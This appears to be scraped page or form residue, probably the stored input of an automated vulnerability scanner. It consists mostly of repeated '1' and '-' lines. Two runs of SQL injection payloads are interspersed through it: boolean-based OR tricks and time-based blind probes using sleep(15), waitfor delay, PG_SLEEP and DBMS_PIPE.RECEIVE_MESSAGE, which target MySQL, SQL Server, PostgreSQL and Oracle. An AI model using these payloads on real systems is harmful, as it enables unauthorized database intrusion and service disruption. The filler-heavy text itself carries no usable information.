-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
CJ0scCR9
-
-1 OR 2+847-847-1=0+0+0+1 --
-
-1 OR 2+607-607-1=0+0+0+1
-
-1' OR 2+827-827-1=0+0+0+1 --
-
-1' OR 2+455-455-1=0+0+0+1 or 'HqzL799D'='
-
1
-
-1" OR 2+882-882-1=0+0+0+1 --
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
-1)); waitfor delay '0:0:15' --
-
1 waitfor delay '0:0:15' --
-
1
-
iRid5AH5'; waitfor delay '0:0:15' --
-
1
-
lGM7ZmgC'); waitfor delay '0:0:15' --
-
1
-
t5A1BVwg')); waitfor delay '0:0:15' --
-
1
-
-5 OR 408=(SELECT 408 FROM PG_SLEEP(15))--
-
1
-
-5) OR 452=(SELECT 452 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
-1)) OR 287=(SELECT 287 FROM PG_SLEEP(15))--
-
1
-
4WO3hh5K' OR 707=(SELECT 707 FROM PG_SLEEP(15))--
-
1
-
OpW5f6vy') OR 580=(SELECT 580 FROM PG_SLEEP(15))--
-
1
-
8N7sQhXJ')) OR 810=(SELECT 810 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
tvugAJ2Y
-
-1 OR 2+575-575-1=0+0+0+1 --
-
1
-
-1 OR 2+787-787-1=0+0+0+1
-
-1' OR 2+908-908-1=0+0+0+1 --
-
1
-
-1' OR 2+383-383-1=0+0+0+1 or 'iHPGx1ai'='
-
-1" OR 2+774-774-1=0+0+0+1 --
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
BmWeiARt'; waitfor delay '0:0:15' --
-
1
-
Ads9aQNH'); waitfor delay '0:0:15' --
-
1
-
nPceWJlA')); waitfor delay '0:0:15' --
-
1
-
-5 OR 691=(SELECT 691 FROM PG_SLEEP(15))--
-
1
-
-5) OR 464=(SELECT 464 FROM PG_SLEEP(15))--
-
1
-
-1)) OR 930=(SELECT 930 FROM PG_SLEEP(15))--
-
1
-
LzewOmVy' OR 491=(SELECT 491 FROM PG_SLEEP(15))--
-
1
-
8sU2QLkK') OR 337=(SELECT 337 FROM PG_SLEEP(15))--
-
1
-
y25ucf0t')) OR 159=(SELECT 159 FROM PG_SLEEP(15))--
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1